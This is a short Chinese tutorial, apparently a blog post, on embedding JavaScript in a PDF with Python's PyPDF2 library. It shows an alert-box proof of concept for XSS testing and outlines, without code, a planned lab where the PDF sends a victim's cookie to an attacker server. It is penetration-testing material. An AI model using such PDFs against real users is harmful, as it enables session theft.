一开始研究用现成的PDF编辑器工具写入,发现又要VIP,又比较繁琐
还不如用 Python装一个库,写代码来的快捷
所以采用了PyPDF2这个库来写入
基础用法
在渗透测试中,能触发弹窗就算是一个漏洞了
# 安装第三方库
pip install PyPDF2 -i https://pypi.tuna.tsinghua.edu.cn/simple
from PyPDF2 import PdfReader,PdfWriter
# 新建一个PDF文档
new_PDF = PdfWriter()
# 写入JavaScript代码
new_PDF.add_js("app.alert(123);")
# 打开一个新的PDF文件,二进制方式写入
f = open("XSS2.pdf","wb")
# 写进PDF,其实这里没看懂,为什么是要反过来写?
new_PDF.write(f)
# 最后保存关闭文件
f.close()
进阶用法
这里要注重实战,搭建一个靶场进行实战
首先打开网站,下发Cookie,然后再到打开PDF反弹Cookie
再模拟黑客用服务器接收Cookie,登录,一条龙
有空再写